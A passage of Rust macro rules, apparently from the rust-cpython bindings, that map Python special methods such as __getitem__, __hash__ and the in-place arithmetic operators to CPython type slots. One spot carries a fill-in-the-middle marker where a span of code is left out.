sdi_setitem: $sdi_setitem_slot_value:tt,
sdi_delitem: {},
]
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number $as_sequence $as_mapping
/* setdelitem */ [
sdi_setitem: $sdi_setitem_slot_value,
sdi_delitem: { $crate::py_class_binary_slot!($class::__delitem__, [Option<&$key_name>], $crate::_detail::libc::c_int, $crate::py_class::slots::UnitCallbackConverter) },
]
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __delitem__(&$slf,) $res_type; { $($body)* } [{ $key : Option<&$key_name> = {} }] }
}
$members $props
}};
{ { def __delitem__(&$slf:ident, $key:ident : &$key_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt $as_sequence:tt $as_mapping:tt
/* setdelitem */ [
sdi_setitem: $sdi_setitem_slot_value:tt,
sdi_delitem: {},
]
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number $as_sequence $as_mapping
/* setdelitem */ [
sdi_setitem: $sdi_setitem_slot_value,<|fim▁hole|> }
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __delitem__(&$slf,) $res_type; { $($body)* } [{ $key : &$key_name = {} }] }
}
$members $props
}};
{ { def __delitem__(&$slf:ident, $key:ident : $key_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt $as_sequence:tt $as_mapping:tt
/* setdelitem */ [
sdi_setitem: $sdi_setitem_slot_value:tt,
sdi_delitem: {},
]
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number $as_sequence $as_mapping
/* setdelitem */ [
sdi_setitem: $sdi_setitem_slot_value,
sdi_delitem: { $crate::py_class_binary_slot!($class::__delitem__, [$key_name], $crate::_detail::libc::c_int, $crate::py_class::slots::UnitCallbackConverter) },
]
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __delitem__(&$slf,) $res_type; { $($body)* } [{ $key : $key_name = {} }] }
}
$members $props
}};
{ { def __delitem__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __delitem__" }
};
{ { def __dir__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__dir__ is not supported by py_class! yet." }
};
{ { def __div__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__div__ is not supported by py_class! yet." }
};
{ { def __divmod__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_divmod: $crate::py_class_numeric_slot!(binary $class::__divmod__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __divmod__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __divmod__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __divmod__" }
};
{ { def __eq__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__eq__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __float__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__float__ is not supported by py_class! yet." }
};
{ { def __floordiv__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_floor_divide: $crate::py_class_numeric_slot!(binary $class::__floordiv__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __floordiv__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __floordiv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __floordiv__" }
};
{ { def __ge__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__ge__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __get__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__get__ is not supported by py_class! yet." }
};
{ { def __getattr__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__getattr__ is not supported by py_class! yet." }
};
{ { def __getattribute__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__getattribute__ is not supported by py_class! yet." }
};
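    // __getitem__ fills two slots at once: sq_item (through the shared
    // slots::sq_item shim, presumably forwarding integer indices) and
    // mp_subscript for mapping-style subscription.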
{ { def __getitem__(&$slf:ident, $key:ident : Option<&$key_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
/* as_mapping */ [ $( $mp_slot_name:ident : $mp_slot_value:expr, )* ]
$setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_item: Some($crate::py_class::slots::sq_item),
]
/* as_mapping */ [
$( $mp_slot_name : $mp_slot_value, )*
mp_subscript: $crate::py_class_binary_slot!($class::__getitem__, [Option<&$key_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __getitem__(&$slf,) $res_type; { $($body)* } [{ $key : Option<&$key_name> = {} }] }
}
$members $props
}};
{ { def __getitem__(&$slf:ident, $key:ident : &$key_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
/* as_mapping */ [ $( $mp_slot_name:ident : $mp_slot_value:expr, )* ]
$setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_item: Some($crate::py_class::slots::sq_item),
]
/* as_mapping */ [
$( $mp_slot_name : $mp_slot_value, )*
mp_subscript: $crate::py_class_binary_slot!($class::__getitem__, [&$key_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __getitem__(&$slf,) $res_type; { $($body)* } [{ $key : &$key_name = {} }] }
}
$members $props
}};
{ { def __getitem__(&$slf:ident, $key:ident : $key_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
/* as_mapping */ [ $( $mp_slot_name:ident : $mp_slot_value:expr, )* ]
$setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_item: Some($crate::py_class::slots::sq_item),
]
/* as_mapping */ [
$( $mp_slot_name : $mp_slot_value, )*
mp_subscript: $crate::py_class_binary_slot!($class::__getitem__, [$key_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __getitem__(&$slf,) $res_type; { $($body)* } [{ $key : $key_name = {} }] }
}
$members $props
}};
{ { def __getitem__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __getitem__" }
};
{ { def __gt__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__gt__ is not supported by py_class! use __richcmp__ instead." }
};
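    // __hash__ maps to tp_hash, returning a Py_hash_t through HashConverter.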
{ { def __hash__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_hash: $crate::py_class_unary_slot!($class::__hash__, $crate::Py_hash_t, $crate::py_class::slots::HashConverter),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __hash__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __hash__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __hash__" }
};
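    // In-place operators (__iadd__, __iand__, and so on) map to the matching
    // nb_inplace_* slots and use the same Option<&T> / &T / T triple of
    // argument forms as __contains__ above.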
{ { def __iadd__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_add: $crate::py_class_binary_slot!($class::__iadd__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iadd__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __iadd__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_add: $crate::py_class_binary_slot!($class::__iadd__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iadd__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __iadd__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_add: $crate::py_class_binary_slot!($class::__iadd__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iadd__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __iadd__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __iadd__" }
};
{ { def __iand__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_and: $crate::py_class_binary_slot!($class::__iand__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iand__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __iand__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_and: $crate::py_class_binary_slot!($class::__iand__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iand__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __iand__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_and: $crate::py_class_binary_slot!($class::__iand__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iand__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __iand__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __iand__" }
};
{ { def __idiv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__idiv__ is not supported by py_class! yet." }
};
{ { def __ifloordiv__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_floor_divide: $crate::py_class_binary_slot!($class::__ifloordiv__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ifloordiv__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __ifloordiv__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_floor_divide: $crate::py_class_binary_slot!($class::__ifloordiv__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ifloordiv__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __ifloordiv__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_floor_divide: $crate::py_class_binary_slot!($class::__ifloordiv__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ifloordiv__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __ifloordiv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __ifloordiv__" }
};
{ { def __ilshift__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_lshift: $crate::py_class_binary_slot!($class::__ilshift__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ilshift__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __ilshift__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_lshift: $crate::py_class_binary_slot!($class::__ilshift__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ilshift__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __ilshift__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_lshift: $crate::py_class_binary_slot!($class::__ilshift__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ilshift__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __ilshift__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __ilshift__" }
};
{ { def __imatmul__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_matrix_multiply: $crate::py_class_binary_slot!($class::__imatmul__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imatmul__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __imatmul__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_matrix_multiply: $crate::py_class_binary_slot!($class::__imatmul__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imatmul__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __imatmul__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_matrix_multiply: $crate::py_class_binary_slot!($class::__imatmul__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imatmul__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __imatmul__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __imatmul__" }
};
{ { def __imod__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_remainder: $crate::py_class_binary_slot!($class::__imod__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imod__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __imod__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_remainder: $crate::py_class_binary_slot!($class::__imod__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imod__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __imod__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_remainder: $crate::py_class_binary_slot!($class::__imod__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imod__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __imod__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __imod__" }
};
{ { def __imul__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_multiply: $crate::py_class_binary_slot!($class::__imul__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imul__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __imul__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
